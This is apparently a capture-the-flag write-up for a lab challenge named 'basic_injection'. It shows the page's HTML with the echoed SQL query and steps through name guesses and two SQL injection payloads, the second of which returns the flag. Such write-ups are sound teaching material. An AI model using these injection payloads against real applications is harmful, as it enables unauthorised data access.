## basic_injection - solution
    
Open the url given in the challenge description and inspect the html code.

```html
...
		<div style="margin-top: 5%" class="row">
			<div class="col l4 push-l4">
				<form action="." method="post">
		  			<h5 class="white-text">Input:  </h5>
		  			<input type="text" name="input" id="textBox" required>
		  			<input id="submit" type="submit" value="Submit">
				</form>
			</div>
		</div>
		<!-- Try some names like Hiroki, Noah, Luke -->
		<div class="row">
			<div class="col l4 push-l4">
	<p>Original Query: SELECT * FROM webfour.webfour where name = '$input'</p>
	<p>Your Resulting Query: SELECT * FROM webfour.webfour where name = ''	</p>		
	<p>
					0 results				</p>
			</div>
		</div>
...
```

Hmmm. Interesting comment.

Try out Hiroki:

![](solution_01.png)

...nothing.

Try out Noah:

![](solution_02.png)

...nothing again.

Try out Luke:

![](solution_03.png)

Finally something response.

Try out '1' = '1' payload with the input <code>1' or '1'='1';--</code>:

![](solution_04.png)

Nothing again.


Then try commenting out with the input <code>1' or '1'='1' #</code>:

![](solution_05.png)

Seems like we got the flag.
